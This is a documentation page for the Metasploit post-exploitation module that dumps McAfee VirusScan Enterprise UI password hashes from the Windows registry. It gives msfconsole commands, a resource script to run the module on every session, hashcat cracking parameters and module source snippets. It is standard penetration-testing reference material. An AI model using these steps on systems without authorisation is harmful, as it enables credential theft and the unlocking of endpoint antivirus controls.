McAfee Virus Scan Enterprise Password Hashes Dump - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/mcafee_vse_hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: McAfee Virus Scan Enterprise Password Hashes Dump
Module: post/windows/gather/credentials/mcafee_vse_hashdump
Source code: modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb
Disclosure date: -
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts the password hash from McAfee Virus Scan Enterprise (VSE) used to lock down the user interface. Hashcat supports cracking this type of hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt (--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic format is available for John the Ripper at the referenced URL.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/mcafee_vse_hashdump

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/mcafee_vse_hashdump
msf post(mcafee_vse_hashdump) > show options
    ... show and set options ...
msf post(mcafee_vse_hashdump) > set SESSION session-id
msf post(mcafee_vse_hashdump) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/mcafee_vse_hashdump")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/mcafee_vse_hashdump post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/mcafee_vse_hashdump

msf6 post(windows/gather/credentials/mcafee_vse_hashdump) > show info

       Name: McAfee Virus Scan Enterprise Password Hashes Dump
     Module: post/windows/gather/credentials/mcafee_vse_hashdump
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Mike Manzotti <[email protected]>
  Maurizio inode Agazzini

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts the password hash from McAfee Virus Scan 
  Enterprise (VSE) used to lock down the user interface. Hashcat 
  supports cracking this type of hash using hash type 
  sha1($salt.unicode($pass)) (-m 140) and a hex salt (--hex-salt) of 
  01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic format is 
  available for John the Ripper at the referenced URL.

References:
  https://www.dionach.com/blog/disabling-mcafee-on-access-scanning

Module Options


This is a complete list of options available in the windows/gather/credentials/mcafee_vse_hashdump post exploitation module:

msf6 post(windows/gather/credentials/mcafee_vse_hashdump) > show options

Module options (post/windows/gather/credentials/mcafee_vse_hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/mcafee_vse_hashdump post exploitation module:

msf6 post(windows/gather/credentials/mcafee_vse_hashdump) > show advanced

Module advanced options (post/windows/gather/credentials/mcafee_vse_hashdump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/mcafee_vse_hashdump module can do:

msf6 post(windows/gather/credentials/mcafee_vse_hashdump) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/mcafee_vse_hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/mcafee_vse_hashdump) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

McAfee VSE not installed or insufficient permissions


Here is a relevant code snippet related to the "McAfee VSE not installed or insufficient permissions" error message:

40:	  def run
41:	    print_status("Looking for McAfee VSE password hashes on #{sysinfo['Computer']} ...")
42:	
43:	    vse_keys = enum_vse_keys
44:	    if vse_keys.empty?
45:	      vprint_error("McAfee VSE not installed or insufficient permissions")
46:	      return
47:	    end
48:	
49:	    hashes_and_versions = extract_hashes_and_versions(vse_keys)
50:	    if hashes_and_versions.empty?

No McAfee VSE hashes extracted


Here is a relevant code snippet related to the "No McAfee VSE hashes extracted" error message:

46:	      return
47:	    end
48:	
49:	    hashes_and_versions = extract_hashes_and_versions(vse_keys)
50:	    if hashes_and_versions.empty?
51:	      vprint_error("No McAfee VSE hashes extracted")
52:	      return
53:	    end
54:	    process_hashes_and_versions(hashes_and_versions)
55:	  end
56:	

No McAfee VSE password hash found in <KEY>


Here is a relevant code snippet related to the "No McAfee VSE password hash found in <KEY>" error message:

71:	    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
72:	    hash_map =  {}
73:	    keys.each do |key|
74:	      hash = registry_getvaldata(key, "UIPEx")
75:	      if hash.empty?
76:	        vprint_error("No McAfee VSE password hash found in #{key}")
77:	        next
78:	      end
79:	
80:	      version = registry_getvaldata(key, "szProductVer")
81:	      if version.empty?

No McAfee VSE version key found in <KEY>


Here is a relevant code snippet related to the "No McAfee VSE version key found in <KEY>" error message:

77:	        next
78:	      end
79:	
80:	      version = registry_getvaldata(key, "szProductVer")
81:	      if version.empty?
82:	        vprint_error("No McAfee VSE version key found in #{key}")
83:	        next
84:	      end
85:	      hash_map[hash] = Rex::Version.new(version)
86:	    end
87:	    hash_map

Unknown McAfee VSE version <VERSION> - Assuming v8


Here is a relevant code snippet related to the "Unknown McAfee VSE version <VERSION> - Assuming v8" error message:

96:	        # Base64 decode hash
97:	        hash =  Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")
98:	        hashtype = 'dynamic_1405'
99:	        version_name = 'v8'
100:	        unless version >= VERSION_8 && version < VERSION_9
101:	          print_warning("Unknown McAfee VSE version #{version} - Assuming v8")
102:	        end
103:	      end
104:	
105:	      print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")
106:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Mike Manzotti <mike.manzotti[at]dionach.com>
  • Maurizio inode Agazzini

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.